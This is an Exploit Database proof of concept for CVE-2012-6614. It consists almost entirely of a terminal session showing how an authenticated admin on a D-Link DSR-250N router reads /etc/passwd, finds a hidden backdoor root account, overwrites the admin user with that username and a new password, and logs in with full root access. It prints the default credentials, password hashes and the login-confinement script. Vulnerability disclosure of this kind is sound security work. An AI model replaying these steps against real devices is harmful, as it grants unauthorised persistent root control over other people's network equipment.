Headline
CVE-2012-6614: Offensive Security’s Exploit Database Archive
D-Link DSR-250N devices before 1.08B31 allow remote authenticated users to obtain “persistent root access” via the BusyBox CLI, as demonstrated by overwriting the super user password.
#
# Router: D-Link DSR-250N
# Hardware Version: A1
# Firmware Version: 1.05B73_WW
#
# Arch: armv6l, Linux
#
# Author: 0_o -- null_null
# nu11.nu11 [at] yahoo.com
# Date: 2012-11-25
#
# Purpose: Persistently become real root on your D-Link DSR-250N
# I just wanted to do real firewalling on this
# cigarette box, but the router software wouldn't
# let me. So it screamed after getting h@kCz0r3d.
#
# Prerequisites: admin access to CLI
#
#
# Here comes the fun stuff... :-)
#
# From the default configuration, you can log in via SSH.
# user: admin, pass: admin
#
root@bt:~# ssh [email protected]
The authenticity of host '192.168.10.1 (192.168.10.1)' can't be established.
RSA key fingerprint is aa:66:55:ee:cc:66:ff:aa:dd:44:55:00:44:99:33:77.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.10.1' (RSA) to the list of known hosts.
[email protected]'s password:
BusyBox v1.17.4 (2011-01-29 12:32:21 IST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
************************************************
Welcome to DSR-250N Command Line Interface
************************************************
D-Link DSR>
.exit Exit this session
.help Display an overview of the CLI syntax
.history Display the current session's command line history
.reboot Reboot the system.
.top Return to the default mode
dot11 [Wireless configuration Mode]
license [License configuration Mode]
net [Networking configuration mode]
qos [QoS configuration Mode]
security [Security configuration mode]
show Display system components' configuration
system [System configuration mode]
util [Utilities Mode]
vpn [VPN configuration Mode]
D-Link DSR>
#
# So you get dropped into the CLI. No shellz :(
# Let's see what we can do from here...
#
D-Link DSR> util cat /etc/passwd
root:!:0:0:root:/root:/bin/sh
ZX4q9Q9JUpwTZuo7:$1$CtRn6tvb$c3GrPDua6tg9pXFWu.9rF1:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
#
# Ohhh, a backdoor user! Shame on you, D-Link!!!
# First, I tried to crack the hash. After 24hrs,
# I dropped that and searched for another way.
# Turns out that there are more nice functions
# available in that CLI... ;-)
#
D-Link DSR> system users edit 1
users-config[userdb]> username ZX4q9Q9JUpwTZuo7
users-config[userdb]> password newpass
users-config[userdb]> password_confirm newpass
users-config[userdb]> save
#
# Now, you will have overwritten the first user
# managed by the D-Link router software. This
# user is your current admin user. We have given him
# the username of the backdoor user and set a new
# password. You might want to add another admin
# user first and modify that.
# For this PoC, I just use default one. Let's see
# what /etc/passwd and /etc/shadow look like now...
#
users-config[userdb]> util cat /etc/passwd
root:!:0:0:root:/root:/bin/sh
ZX4q9Q9JUpwTZuo7:wq8NLLJdoSzSw:0:0:root:/:/bin/sh
nobody:x:0:0:nobody:/nonexistent:/bin/false
guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
users-config[userdb]> util cat /etc/shadow
guest:TN08ndVLhlVok:14975:0:99999:7:::
#
# So, the MD5-Crypt hash has been replaced by a
# DES-Crypt (unix crypt) hash...
#
users-config[userdb]> exit
D-Link DSR> .exit
Connection to 192.168.10.1 closed by remote host.
Connection to 192.168.10.1 closed.
#
# Let's have a taste of the new freedom...
#
root@bt:~# ssh [email protected]
[email protected]'s password:
BusyBox v1.17.4 (2011-01-29 12:32:21 IST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
DSR-250N> id
uid=0(root) gid=0(root) groups=0(root)
DSR-250N> uname -a
Linux DSR-250N 2.6.31.1-cavm1 #5 Fri Sep 28 11:41:26 IST 2012 armv6l GNU/Linux
DSR-250N> ls -la /
drwxr-xr-x 18 root root 0 Jan 1 00:00 .
drwxr-xr-x 18 root root 0 Jan 1 00:00 ..
drwxr-xr-x 2 root root 0 Jan 1 00:02 bin
lrwxrwxrwx 1 root root 5 Jan 1 1970 data -> flash
drwxr-xr-x 5 root root 0 Jan 1 00:02 dev
drwxr-xr-x 12 root root 0 Jan 1 00:08 etc
drwxr-xr-x 4 root root 0 Jan 1 1970 flash
drwxr-xr-x 2 root root 0 Jan 1 1970 flash_multiboot
drwxr-xr-x 4 root root 0 Jan 1 00:01 home
lrwxrwxrwx 1 root root 10 Sep 28 2012 init -> /sbin/init
drwxr-xr-x 2 root root 0 Jan 1 00:00 lib
lrwxrwxrwx 1 root root 12 Sep 28 2012 linuxrc -> /bin/busybox
drwxr-xr-x 3 root root 0 Jan 1 1970 mnt
drwxr-xr-x 9 root root 146 Sep 28 2012 pfrm2.0
dr-xr-xr-x 71 root root 0 Jan 1 1970 proc
drwxr-xr-x 2 root root 0 Sep 28 2012 root
drwxr-xr-x 2 root root 0 Jan 1 00:01 sbin
drwxr-xr-x 11 root root 0 Jan 1 1970 sys
-rw-r--r-- 1 root root 5 Jan 1 00:00 temp
drwxrwxrwt 4 root root 380 Jan 1 00:09 tmp
drwxr-xr-x 6 root root 0 Jan 1 1970 usr
drwxrwxrwt 18 root root 1200 Jan 1 00:03 var
DSR-250N> df -h
Filesystem Size Used Available Use% Mounted on
tmpfs 61.2M 956.0K 60.3M 2% /tmp
tmpfs 61.2M 932.0K 60.3M 1% /var
tmpfs 61.2M 0 61.2M 0% /mnt/tmpfs
/dev/mtdblock3 19.5M 19.5M 0 100% /pfrm2.0
/dev/mtdblock4 2.1M 504.0K 1.6M 23% /flash
DSR-250N> echo "r00ted! :-)"
r00ted! :-)
DSR-250N> exit
Connection to 192.168.10.1 closed.
root@bt:~#
#
# Your web gui will not work until you reboot your box. Then, log
# in with the backdoor user and you will have the full admin gui back.
#
# By the way, how did they confine us to the CLI in the first place?
#
DSR-250N> cat /etc/profile
# /etc/profile
LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
PATH=.:/pfrm2.0/bin:$PATH
CLISH_PATH=/etc/clish
export PATH LD_LIBRARY_PATH CLISH_PATH
# redirect all users except root to CLI
if [ "$USER" != "ZX4q9Q9JUpwTZuo7" ] ; then
trap "/bin/login" SIGINT
trap "" SIGTSTP
/pfrm2.0/bin/cli
exit
fi
PS1='DSR-250N> '
DSR-250N>